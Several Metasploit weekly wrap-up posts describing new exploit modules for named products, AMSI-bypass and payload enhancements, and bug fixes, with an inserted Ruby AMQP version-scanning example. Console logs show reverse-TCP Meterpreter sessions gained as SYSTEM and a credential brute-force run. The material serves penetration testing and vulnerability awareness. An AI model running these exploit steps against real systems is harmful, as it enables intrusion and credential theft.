[*] Modifying internal.properties to allow process creation...
[*] Waiting for configuration change to be applied...
[*] Executing payload...
[*] Resetting the internal.properties settings...
[*] Sending stage (200774 bytes) to 192.168.250.237
[*] Waiting for configuration change to be applied...
[*] Deleting the authentication token.
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter >

New module content (2)

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18408 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2023_42793

Description: This adds an unauthenticated RCE for JetBrains TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.

Microsoft Error Reporting Local Privilege Elevation Vulnerability

Authors: Filip Dragović (Wh04m1001), Octoberfest7, and bwatters-r7
Type: Exploit
Pull request: #18314 contributed by bwatters-r7
Path: windows/local/win_error_cve_2023_36874

Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10 x64 22H2.

Enhancements and features (1)

  • #18399 from h00die - Fixes multiple spelling mistakes in module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit T-Shirt Design Contest

Metasploit Weekly Wrap-Up

In honor of Metasploit's 20th anniversary, Rapid7 is launching special edition t-shirts - and we're inviting members of our community to have a hand in their creation. The contest winner will have their design featured on the shirts, which will then be available to pick up at Black Hat 2023.

We will be accepting submissions from now through June 30! Contest details, design guidelines, and submission instructions can be found here.

New module content (12)

RPyC 4.1.0 through 4.1.1 Remote Command Execution

Authors: Aaron Meese and Jamie Hill-Daniel
Type: Auxiliary
Pull request: #17670 contributed by ajmeese7
AttackerKB reference: CVE-2019-16328

Description: Adds a new rpyc_rce module to exploit CVE-2019-16328 and achieve remote command execution as the vulnerable server’s service user.

Apache RocketMQ Version Scanner

Authors: Malayke and h00die
Type: Auxiliary
Pull request: #18075 contributed by h00die

Description: This PR adds a version scanner for Apache RocketMQ.

Symmetricom SyncServer Unauthenticated Remote Command Execution

Authors: Justin Fatuch Apt4hax, Robert Bronstein, and Steve Campbell
Type: Exploit
Pull request: #18077 contributed by sdcampbell
AttackerKB reference: CVE-2022-40022

Description: This adds an exploit for Symmetricom SyncServer appliances (S100-S300 series) vulnerable to an unauthenticated command injection in the hostname parameter in a request to the /controller/ping.php endpoint. The command injection vulnerability is patched in the S650 v2.2. Requesting the endpoint will result in a redirect to the login page; however, the command will still be executed, resulting in RCE as the root user.

TerraMaster TOS 4.2.06 or lower - Unauthenticated Remote Code Execution

Authors: IHTeam and h00die-gr3y
Type: Exploit
Pull request: #18063 contributed by h00die-gr3y
AttackerKB reference: CVE-2020-28188

Description: This adds an exploit for TerraMaster NAS devices running TOS 4.2.06 or prior. The logic in include/makecvs.php permits shell metacharacters through the Event parameter in a GET request, permitting the upload of a webshell without authentication. Through this, an attacker can achieve remote code execution as the user running the TOS web interface.

TerraMaster TOS 4.2.15 or lower - RCE chain from unauthenticated to root via session crafting.

Authors: h00die-gr3y and n0tme
Type: Exploit
Pull request: #18070 contributed by h00die-gr3y
AttackerKB reference: CVE-2021-45841

Description: This exploits a series of vulnerabilities including session crafting and command injection in TerraMaster NAS versions 4.2.15 and below to achieve unauthenticated RCE as the root user.

TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989

Authors: 0xf4n9x, Octagon Networks, and h00die-gr3y
Type: Exploit
Pull request: #18086 contributed by h00die-gr3y
AttackerKB reference: CVE-2022-24989

Description: This exploits an administrative password leak and command injection vulnerability on TerraMaster devices running TerraMaster Operating System (TOS) versions 4.2.29 and below to achieve unauthenticated RCE as the root user.

Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution

Author: sf
Type: Exploit
Pull request: #18016 contributed by sfewer-r7
AttackerKB reference: CVE-2023-28771

Description: This adds an exploit for CVE-2023-28771, a remote, unauthenticated OS command injection in the IKE service of several Zyxel devices. Successful exploitation results in remote command execution as the root user.

Oracle Weblogic PreAuth Remote Command Execution via ForeignOpaqueReference IIOP Deserialization

Authors: 14m3ta7k, 4ra1n, and Grant Willcox
Type: Exploit
Pull request: #17946 contributed by gwillcox-r7
AttackerKB reference: CVE-2023-21839

Description: This adds an exploit for CVE-2023-21839 which is an unauthenticated RCE in Oracle Weblogic. Successful exploitation results in remote code execution as the oracle user.

Three x86 Linux Fetch Payloads

Author: Spencer McIntyre
Type: Payload
Pull request: #18084

Description: Fetch and execute an x86 payload from an HTTP server. These modules were developed live on stream. Fetch-based payloads offer a shorter path from command injection to a Metasploit session.

Authors: Daniel López Jiménez (attl4s) and Simone Salucci (saim1z)
Type: Post
Pull request: #18022 contributed by attl4s

Description: This adds the post/windows/manage/make_token module which is capable of creating new tokens from known credentials and then setting them in a running instance of Meterpreter, which can allow that session to access resources it might not have previously been able to access.

Enhancements and features (11)

  • #17336 from smashery - This PR adds new code to simplify and standardize windows version checking and comparisons.
  • #17781 from araout42 - Adds support for module writers to supply a custom include_dirs array when using the MinGW library to compile payloads.
  • #17942 from cdelafuente-r7 - The script generated by the web_delivery module is blocked by the Antimalware Scan Interface (AMSI) on newer versions of Windows. This PR includes an enhancement which allows the web_delivery module to bypass AMSI.
  • #17955 from jvoisin - Reduces the size of PHP payloads such as php/reverse_php.
  • #18050 from adfoster-r7 - Adds a new post/test/all module which will run all available post/test modules against the open session.
  • #18069 from sempervictus - This updates the LDAP server library to handle unbind requests.
  • #18089 from shellchocolat - Adds support for the masm output format when generating payloads.
  • #18106 from adfoster-r7 - This PR updates Meterpreter's setg SessionTLVLogging true support to no longer truncate useful values such as payload UUIDs, file paths, executed commands etc.
  • #18109 from adfoster-r7 - Update test post modules to always have a clean, writable, and consistent test file system directory when running modules under the loadpath test/modules directory.
  • #18110 from adfoster-r7 - When running test modules that have been loaded by loadpath test/modules, any verbose printing logic generated will now be prefixed by the current test that is being run.
  • #18115 from adfoster-r7 - This PR updates unknown Windows errors on Python Meterpreter to include the original error code.

Bugs fixed (15)

  • #18051 from adfoster-r7 - Adds additional skip calls to the test/post modules to ensure that only relevant test expectations are run against the specified session without crashes.
  • #18054 from bwatters-r7 - This PR fixes the issue where an ArgumentError was thrown on the FETCH_SRVHOST option when running the info command when using a fetch payload.
  • #18068 from smashery - Fixes a bug that caused multi/manage/shell_to_meterpreter to not break when win_transfer=VBS was set.
  • #18076 from smashery - This fixes a bug in the Windows Meterpreter's memory free API.
  • #18083 from zeroSteiner - A bug has been fixed in the stdapi extension of Meterpreter when calling the stdapi_sys_process_memory_free command: it incorrectly handled memory, leading to a double free condition that would crash Meterpreter.
  • #18090 from adfoster-r7 - The auxiliary/admin/kerberos/keytab EXPORT action will now consistently order exported entries.
  • #18097 from adfoster-r7 - This PR fixes Python Meterpreter sessions from crashing when extracting macOS network configuration when using the route or ipconfig commands.
  • #18098 from adfoster-r7 - This PR fixes rex-text crashes when running Ruby 3.3.
  • #18099 from adfoster-r7 - This PR fixes Python Meterpreter subprocess deadlock and file descriptor leak caused by the stdout/stderr file descriptors not being closed.
  • #18101 from adfoster-r7 - This PR fixes a Python Meterpreter macOS route command crash when ifconfig has a gateway name as a MAC address separated by dots.
  • #18102 from adfoster-r7 - This PR adds a fix for false negatives on files not existing on Windows Python Meterpreter.
  • #18105 from adfoster-r7 - This PR fixes a bug when running the time command in msfconsole with complex commands.
  • #18108 from adfoster-r7 - Updates the test/services module to more consistently pass. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
  • #18111 from adfoster-r7 - This PR fixes an initialized constant error when Meterpreter registry key reads timeout.
  • #18112 from adfoster-r7 - This PR fixes a symlink test bug when running Python Meterpreter on Windows.

Documentation added (1)

  • #18058 from gwillcox-r7 - Adds additional details on how to navigate the Metasploit codebase.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Chaining for the win #1: Pentaho Business Server

Metasploit Wrap-up

This week, our very own jheysel-r7 added an exploit module that leverages two vulnerabilities in Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x. The module chains an authentication bypass (CVE-2022-43939) and a Server-Side Template Injection (SSTI) vulnerability (CVE-2022-43769) to achieve unauthenticated code execution as the user running the application. Patches are available and it is highly recommended to apply them as soon as possible. The exploit is straightforward to execute and very reliable.

Chaining for the win #2: Zyxel

Community contributor h00die-gr3y added another exploit module that also chains two vulnerabilities, this time targeting Zyxel devices. It exploits an unauthenticated local file disclosure (LFI) vulnerability (CVE-2023-28770) and a weak password derivation algorithm to obtain unauthenticated remote code execution as the supervisor user. These vulnerabilities affect the zhttpd and zcmd binaries, respectively, which are present on more than 40 Zyxel routers and CPE devices. The module leverages the LFI to read the entire configuration of the router, from which it derives the supervisor password by exploiting the weak password derivation algorithm. Finally, if the device is reachable via SSH, the module establishes a connection using the leaked supervisor credentials to execute commands.

GSoC Project: Enable HTTP-Trace for scanner modules

One more successful GSoC project to enhance Metasploit has landed this week. Contributor 3V3RYONE extended the HTTP-Trace capability to login scanner modules; it was previously only available to exploit modules. This is a very useful feature for debugging a module, as it lets users display the full HTTP requests and responses of scanner modules within msfconsole. More information about previous Metasploit GSoC projects can be found here.

Here is an example output of a login scanner module running with the HTTPTrace feature enabled:

msf6 > use auxiliary/scanner/http/buffalo_login 
msf6 auxiliary(scanner/http/buffalo_login) > set RHOSTS www.example.com
RHOSTS => www.example.com
msf6 auxiliary(scanner/http/buffalo_login) > set USERPASS_FILE data/wordlists/http_default_userpass.txt
USERPASS_FILE => data/wordlists/http_default_userpass.txt
msf6 auxiliary(scanner/http/buffalo_login) > set HttpTrace true
HttpTrace => true
msf6 auxiliary(scanner/http/buffalo_login) > run

####################
# Request:
####################
POST /dynamic.pl HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

bufaction=verifyLogin&user=connect&password=connect
####################
# Response:
####################
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Mon, 26 Sep 2022 06:21:16 GMT
Connection: close

[...]

New module content (3)

Zyxel chained RCE using LFI and weak password derivation algorithm

Authors: Bogi Napoleon Wennerstrøm, SEC Consult Vulnerability Lab, Thomas Rinsma, and h00die-gr3y
Type: Exploit
Pull request: #17881 contributed by h00die-gr3y
AttackerKB reference: CVE-2023-28770

Description: This adds a new exploit module that leverages multiple vulnerabilities in the zhttpd and zcmd binaries, which are present on more than 40 Zyxel routers and CPE devices, to achieve remote code execution as the supervisor user. This chains a local file disclosure vulnerability that allows an unauthenticated attacker to read the configuration file with a weak password derivation algorithm vulnerability. The module uses the leaked credentials to establish an SSH connection and execute commands.

Pentaho Business Server Auth Bypass and Server Side Template Injection RCE

Authors: Harry Withington, dwbzn, and jheysel-r7
Type: Exploit
Pull request: #17964 contributed by jheysel-r7
AttackerKB reference: CVE-2022-43939

Description: A new module has been added which exploits Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x. To do this it first exploits CVE-2022-43939 to bypass authentication before using CVE-2022-43769, a Server Side Template Injection (SSTI) vulnerability, to achieve unauthenticated code execution as the user running the Pentaho Business Analytics Server.

ManageEngine ADAudit Plus Authenticated File Write RCE

Authors: Erik Wynter and Moon
Type: Exploit
Pull request: #17133 contributed by ErikWynter
AttackerKB reference: CVE-2021-42847

Description: A new exploit module has been added which gains authenticated RCE on ManageEngine ADAudit Plus builds 7005 and prior by creating a custom alert profile and leveraging the custom alert script component. On builds 7004 and later, CVE-2021-42847 is utilized to gain RCE as the user running ADAudit Plus, which will typically be a local administrator, via an arbitrary file write to create the necessary script for the alert profile.

Enhancements and features (3)

  • #17060 from 3V3RYONE - Updates the HTTP scanner modules with the functionality to log both HTTP requests and responses. This functionality can be enabled with set HTTPTrace true. This functionality is useful for debugging modules. In scenarios where the traffic is encrypted, for instance with WinRM, the logged values will be unencrypted.
  • #17807 from gwillcox-r7 - Adds documentation for Metasploit's folder structure, so that those unfamiliar with Metasploit can quickly get up to speed and understand where files might be located or where to place new files when developing content for Metasploit.
  • #17972 from h00die - Updates the example modules to align with the latest Metasploit framework module conventions.

Bugs fixed (2)

  • #17968 from zeroSteiner - A bug has been fixed where Certificate Templates were not being identified as vulnerable when there was an ACE that granted enrollment rights but did not correspond to any object types. The logic has now been updated so that only ACEs associated with an object that is neither the CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT right nor the CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT right will be ignored.
  • #17980 from sempervictus - This fixes the file system path check used by PowerShell sessions.

Documentation added (1)

  • #17984 from adfoster-r7 - Fixes a Kerberos datastore name typo in the WinRM wiki docs.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Windows 11 AFD WinSock Priv Esc

Metasploit Weekly Wrap-up

The new windows/local/cve_2023_21768_afd_lpe exploit makes use of a brand new Windows kernel exploitation technique that leverages the I/O ring feature introduced in Windows 11 21H2. This technique comes from Yarden Shafir's research and provides a full read/write primitive on Windows 11. The underlying bug is a write-where vulnerability that allows an arbitrary write of one byte in kernel memory. This is enough to modify the I/O ring internal structures and gain code execution as the NT AUTHORITY\SYSTEM user. The Metasploit module is based on the exploit PoC authored by chompie1337 and b33f.

Example running with Windows 11 Version 22H2 Build 22621.963 x64:

msf6 exploit(windows/local/cve_2023_21768_afd_lpe) > run verbose=true
[*] Started reverse TCP handler on 192.168.100.9:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Windows Build Number = 22621.963
[+] The target appears to be vulnerable.
[*] Launching netsh to host the DLL...
[+] Process 3748 launched.
[*] Reflectively injecting the DLL into 3748...
[*] Sending stage (200774 bytes) to 192.168.100.9
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 11 opened (192.168.100.9:4444 -> 192.168.100.9:55346) at 2023-03-27 18:46:08 +0200
meterpreter >

SolarWinds RCE and AMQP Support

Metasploit 6.3.10 now has support for the Advanced Message Queuing Protocol (AMQP). This protocol is used in services such as RabbitMQ. Three new modules have been added that leverage this functionality thanks to the work of our very own Spencer McIntyre:

The exploits/windows/misc/solarwinds_amqp_deserialization module adds an exploit for CVE-2022-38108 which is an authenticated .NET deserialization vulnerability within the SolarWinds platform's SWIS (SolarWinds Information Service) component. To trigger the vulnerability, an attacker must authenticate to the RabbitMQ (message queue) server (via the AMQP protocol) and publish a specially crafted object. Once SWIS receives the message, it will deserialize it, allowing for OS command execution as NT AUTHORITY\SYSTEM. Example targeting SolarWinds Orion NPM 2020.2.6 on Windows Server 2019 x64:

msf6 > use exploit/windows/misc/solarwinds_amqp_deserialization 
[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
RHOSTS => 192.168.159.17
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
USERNAME => hax
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run
[*] Powershell command length: 4175
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.17:5671 - Successfully connected to the remote server.
[*] 192.168.159.17:5671 - Successfully opened a new channel.
[*] 192.168.159.17:5671 - Successfully published the message to the channel.
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400
meterpreter >

The auxiliary/scanner/amqp/amqp_version module displays the version information about Advanced Message Queuing Protocol (AMQP) 0-9-1 servers:

msf6 > use auxiliary/scanner/amqp/amqp_version
msf6 auxiliary(scanner/amqp/amqp_version) > set RHOSTS 192.168.159.0/24
RHOSTS => 192.168.159.0/24
msf6 auxiliary(scanner/amqp/amqp_version) > run
[*] 192.168.159.17:5671 - AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PLAIN)
[*] 192.168.159.0/24:5671 - Scanned  51 of 256 hosts (19% complete)
[*] 192.168.159.0/24:5671 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.159.0/24:5671 - Scanned  98 of 256 hosts (38% complete)
[*] 192.168.159.128:5671 - AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
[*] 192.168.159.0/24:5671 - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.159.0/24:5671 - Scanned 150 of 256 hosts (58% complete)
[*] 192.168.159.0/24:5671 - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.159.0/24:5671 - Scanned 199 of 256 hosts (77% complete)
[*] 192.168.159.0/24:5671 - Scanned 216 of 256 hosts (84% complete)
[*] 192.168.159.0/24:5671 - Scanned 233 of 256 hosts (91% complete)
[*] 192.168.159.0/24:5671 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/amqp/amqp_version) > services 
Services
========
host             port  proto  name   state  info
----             ----  -----  ----   -----  ----
192.168.159.17   5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PL
                                            AIN)
192.168.159.128  5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
msf6 auxiliary(scanner/amqp/amqp_version) 
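To show what a version scanner like the one above actually decodes, here is an added Ruby example; it is not Metasploit's own code and not the amqp_version module. It builds a constructed AMQP 0-9-1 Connection.Start frame with made-up broker values (the cluster name, platform and version strings are sample data), parses it the way a scanner would, and formats the same summary line the module prints. The probe_amqp helper and its host/port arguments are assumptions for illustration and are not exercised by the offline sample.

```ruby
# Added example (not Metasploit's own code): the AMQP 0-9-1 opening exchange a
# version scanner relies on. The client sends an 8-byte protocol header; a 0-9-1
# broker answers with a Connection.Start method frame whose server-properties
# table carries product, version, cluster_name and platform, and whose
# "mechanisms" string lists the SASL mechanisms the broker will accept.
require 'socket'

PROTOCOL_HEADER  = "AMQP\x00\x00\x09\x01".b  # "AMQP", protocol id 0, version 0.9.1
FRAME_METHOD     = 1
FRAME_END        = 0xCE
CLASS_CONNECTION = 10
METHOD_START     = 10

class AmqpDecodeError < StandardError; end

# --- minimal encoder, used here only to build the constructed sample frame ---
def encode_shortstr(s); [s.bytesize].pack('C') + s.b; end
def encode_longstr(s);  [s.bytesize].pack('N') + s.b; end

def encode_table(hash)
  body = hash.map do |k, v|
    entry = encode_shortstr(k.to_s)
    case v
    when String      then entry + 'S'.b + encode_longstr(v)
    when true, false then entry + 't'.b + [v ? 1 : 0].pack('C')
    when Hash        then entry + 'F'.b + encode_table(v)
    else raise ArgumentError, "unsupported table value #{v.class}"
    end
  end.join.b
  [body.bytesize].pack('N') + body
end

def build_connection_start(props, mechanisms:, locales: 'en_US')
  payload = [CLASS_CONNECTION, METHOD_START, 0, 9].pack('nnCC') + # class, method, major 0, minor 9
            encode_table(props) + encode_longstr(mechanisms) + encode_longstr(locales)
  [FRAME_METHOD, 0, payload.bytesize].pack('CnN') + payload + [FRAME_END].pack('C')
end

# --- decoder: field table, covering the value types RabbitMQ emits in server-properties ---
def decode_table(buf, pos)
  stop = pos + 4 + buf[pos, 4].unpack1('N')
  pos += 4
  table = {}
  while pos < stop
    klen = buf.getbyte(pos)
    key  = buf[pos + 1, klen].force_encoding('UTF-8')
    pos += 1 + klen
    type = buf[pos]
    pos += 1
    case type
    when 'S'                                   # long string
      vlen = buf[pos, 4].unpack1('N')
      table[key] = buf[pos + 4, vlen].force_encoding('UTF-8')
      pos += 4 + vlen
    when 't'                                   # boolean
      table[key] = buf.getbyte(pos) != 0
      pos += 1
    when 'F'                                   # nested table (e.g. capabilities)
      table[key], pos = decode_table(buf, pos)
    when 'I'                                   # signed 32-bit integer
      table[key] = buf[pos, 4].unpack1('l>')
      pos += 4
    else
      raise AmqpDecodeError, "unsupported field type #{type.inspect} for #{key}"
    end
  end
  raise AmqpDecodeError, 'field table overran its declared length' unless pos == stop
  [table, pos]
end

# Parse a complete Connection.Start frame and return the fields a scanner reports.
def parse_connection_start(frame)
  frame = frame.b
  type, _channel, size = frame.unpack('CnN')
  raise AmqpDecodeError, 'not a method frame (non-0-9-1 broker, or TLS required?)' unless type == FRAME_METHOD
  raise AmqpDecodeError, 'truncated frame' unless frame.bytesize == 7 + size + 1
  raise AmqpDecodeError, 'missing frame-end octet' unless frame.getbyte(7 + size) == FRAME_END
  payload = frame[7, size]
  cls, meth, vmaj, vmin = payload.unpack('nnCC')
  raise AmqpDecodeError, "unexpected method #{cls}.#{meth}" unless cls == CLASS_CONNECTION && meth == METHOD_START
  props, pos = decode_table(payload, 6)
  mlen = payload[pos, 4].unpack1('N')
  mechanisms = payload[pos + 4, mlen].force_encoding('UTF-8')
  pos += 4 + mlen
  llen = payload[pos, 4].unpack1('N')
  locales = payload[pos + 4, llen].force_encoding('UTF-8')
  { protocol: "#{vmaj}-#{vmin}", product: props['product'], version: props['version'],
    cluster: props['cluster_name'], platform: props['platform'],
    mechanisms: mechanisms.split, locales: locales.split }
end

# Same one-line summary format the amqp_version module prints.
def summarize(info)
  "AMQP Detected (version:#{info[:product]} #{info[:version]}) (cluster:#{info[:cluster]}) " \
  "(platform:#{info[:platform]}) (authentication:#{info[:mechanisms].join(', ')})"
end

# Live probe over plain TCP (assumed helper, not run by the offline sample); for an
# amqps listener wrap the socket in OpenSSL::SSL::SSLSocket before writing.
def probe_amqp(host, port = 5672, timeout: 5)
  sock = Socket.tcp(host, port, connect_timeout: timeout)
  sock.write(PROTOCOL_HEADER)
  header = sock.read(7)
  raise AmqpDecodeError, 'broker closed without a frame' if header.nil? || header.bytesize < 7
  size = header[3, 4].unpack1('N')
  parse_connection_start(header + sock.read(size + 1).to_s)
ensure
  sock&.close
end

# Constructed sample frame: every value below is made up and stands in for a real broker's answer.
SAMPLE_FRAME = build_connection_start(
  { 'capabilities' => { 'publisher_confirms' => true, 'basic.nack' => true },
    'cluster_name' => 'rabbit@broker-example', 'platform' => 'Erlang/OTP 25.3',
    'product' => 'RabbitMQ', 'version' => '3.11.10' },
  mechanisms: 'PLAIN AMQPLAIN'
)

puts summarize(parse_connection_start(SAMPLE_FRAME)) if $PROGRAM_NAME == __FILE__
```

The mechanisms field is worth keeping in inventory output: a broker that advertises only PLAIN and AMQPLAIN on the non-TLS port 5672 is accepting credentials in cleartext on the wire. A broker that does not speak 0-9-1, or that insists on TLS, answers the header with its own protocol header or closes the connection, which the decoder reports as an error instead of inventing a version.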

The new auxiliary/scanner/amqp/amqp_login module can be used to bruteforce service credentials:

msf6 > use auxiliary/scanner/amqp/amqp_login 
msf6 auxiliary(scanner/amqp/amqp_login) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(scanner/amqp/amqp_login) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(scanner/amqp/amqp_login) > set PASS_FILE data/wordlists/unix_passwords.txt
PASS_FILE => data/wordlists/unix_passwords.txt
msf6 auxiliary(scanner/amqp/amqp_login) > set RPORT 5672
RPORT => 5672
msf6 auxiliary(scanner/amqp/amqp_login) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 auxiliary(scanner/amqp/amqp_login) > run
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:Password1! (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:admin (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:12345 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456789 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[+] 192.168.159.128:5672 - Login Successful: admin:password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/amqp/amqp_login) > 

New module content (5)

AMQP 0-9-1 Login Check Scanner

Author: Spencer McIntyre
Type: Auxiliary
Pull request: #17828 contributed by zeroSteiner

Description: This adds a login scanner module for AMQP services.

AMQP 0-9-1 Version Scanner

Author: Spencer McIntyre
Type: Auxiliary
Pull request: #17827 contributed by zeroSteiner

Description: This adds a scanner module that extracts version information from AMQP protocol servers.

Optergy Proton and Enterprise BMS Command Injection using a backdoor

Authors: Gjoko Krstic and h00die-gr3y
Type: Exploit
Pull request: #17806 contributed by h00die-gr3y
AttackerKB reference: CVE-2019-7276

Description: This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise Building Management System (BMS) applications.

Ancillary Function Driver (AFD) for WinSock Elevation of Privilege

Authors: Christophe De La Fuente, Yarden Shafir, b33f, and chompie
Type: Exploit
Pull request: #17826 contributed by cdelafuente-r7
AttackerKB reference: CVE-2023-21768

Description: This PR adds an exploit module for CVE-2023-21768 that achieves local privilege escalation on Windows 11 22H2.

SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE

Authors: Justin Hong, Lucas Miller, Piotr Bazydło, and Spencer McIntyre
Type: Exploit
Pull request: #17785 contributed by zeroSteiner
AttackerKB reference: CVE-2022-38108

Description: This adds an exploit for an authenticated .NET deserialization vulnerability that affects the SolarWinds Information Service (SWIS) component within SolarWinds. The SWIS component will deserialize messages received by the AMQP message queue, resulting in command execution as NT AUTHORITY\SYSTEM.

Enhancements and features (6)

  • #17724 from dwelch-r7 - Updates the modules/auxiliary/admin/kerberos/forge_ticket.rb module with a new IncludeTicketChecksum option. When set to true the forged PAC will include the PAC_TICKET_CHECKSUM required in newer Windows AD implementations.
  • #17753 from adfoster-r7 - Updates the auxiliary/admin/kerberos/get_ticket module to support using forged golden tickets. Users can now provide the Krb5Ccname option to supply the Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked for a valid TGT as normal.
  • #17789 from bcoles - This PR adds enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.
  • #17813 from samueloph - This sets the CHECK_FALSE option to true by default so that the scanner will bail upon detecting false positive results.
  • #17833 from adfoster-r7 - Updates the Metasploit RPC module.info command response to include whether or not the module supports a check method.

Bugs fixed (6)

  • #17704 from ide0x90 - Fixes a crash in multi/http/solr_velocity_rce that was discovered when targeting a machine running Apache Solr 8.3.0 on Linux that required authentication.
  • #17808 from adfoster-r7 - Updates multiple broken Secunia references in modules with equivalent links found within Wayback Machine - a digital archive of the world wide web founded by the Internet Archive.
  • #17818 from adfoster-r7 - This PR fixes a crash in the RPC job info command.
  • #17825 from dm-ct - Fixes broken documentation references in the exploits/linux/local/zimbra_slapper_priv_esc module.
  • #17830 from bcoles - Fixes a crash when parsing dates in ./tools/modules/committer_count.rb.
  • #17831 from dm-ct - Fixes broken documentation references in the exploits/aix/rpc_cmsd_opcode21.rb module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).